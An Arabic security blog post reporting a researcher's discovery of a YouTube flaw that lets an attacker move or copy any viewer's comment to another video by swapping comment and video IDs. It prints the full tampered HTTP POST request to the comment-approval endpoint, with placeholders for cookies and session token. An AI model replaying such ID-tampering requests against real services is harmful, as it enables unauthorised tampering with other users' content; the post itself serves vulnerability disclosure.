جديد : ثغرة على يوتوب تخول للهاكر تحويل أي تعليق من ڤيديو لآخر

إستطاع الباحث الأمني إبراهيم مصعد السيد من إكتشاف تغرة حرجة على موقع يوتوب ، الثغرة تمكن الهاكر من تحويل أي تعليق على الڤيديوهات لڤيديوهات أخرى ونسخها كذلك وذلك بدون أخد صلاحيات المستخدم بحيث هنا تكمن خطورة هاته الثغرة .
الثغرة تسمح كذلك بظهور التعليق على واجهة Discusion Board مع تعديل بسيط على الخصائص بالتعليقات في القناة بحيث تقوم بعملية الموافقة عليها فور عمل أي تعليق من طرف أحد المشاهدين كما تشاهدون في الصورة 

وهذا هو ما سهل الطريق على الخبير الأمني للتحكم بالمعرف الخاص لكل تعليق وڤيديو ID وتغييره عبر عمل لطلبات Http Request للموقع بحيث يمكنك مباشرة الحصول على المعرف الخاص بالڤيديو وكذا التعليق وعمل تغيييرات عليها وبالتالي إستغلال الثغرة . لكن كما سبق وذكر الخبير الأمني أنه في لحظة تغيير المعرف الخاص بالڤيديو بمعرف لڤيديو آخر لم يستطع الحصول على أية معلومات تذكر ، لكنه قام بتغيير المعرف الخاص بالتعليق وتغييره بمعرف لتعليق آخر وهنا تنجح العملية وبالتالي تحويل أي تعليق لأي ڤيديو تريده .

HTTP REQUEST
POST /comment_ajax?action_approve=1 HTTP/1.1
Host: www.youtube.com
Connection: keep-alive
Content-Length: 346
X-YouTube-Page-CL: 91004291
Origin: https://www.youtube.com
X-YouTube-Page-Timestamp: Mon Apr 13 11:05:13 2015 (1428948313)
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
X-YouTube-Variants-Checksum: 44615475844a61a0815f3a5c63bf5598
Content-Type: application/x-www-form-urlencoded
Accept: */*
X-Client-Data: CIm2yQEIo7bJAQiptskBCIqSygEIspXKAQ==
Referer: https://www.youtube.com/comments?filter=all&highlights=False&tab=moderate
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: [Your Cookies Here]
comment_id=z13weljbzumagnr2u22yubxh5xvxjddlm&video_id=CPzDx1vlb8s&session_token=[Session Token Here]

بقلم

محمد لحلو

المدير التقني لمدونة مجتمع الأمن المعلوماتي مدون ومغرد حول مجال الأمن المعلوماتي والحماية الإلكترونية ! مهتم بكل جديد حول المجال الأمني بصفة خاصة والتقني بصفة عامة من مواليد مدينة فاس المغرب .

2016 © جميع الحقوق محفوظة
تطوير : عدنان المجدوبي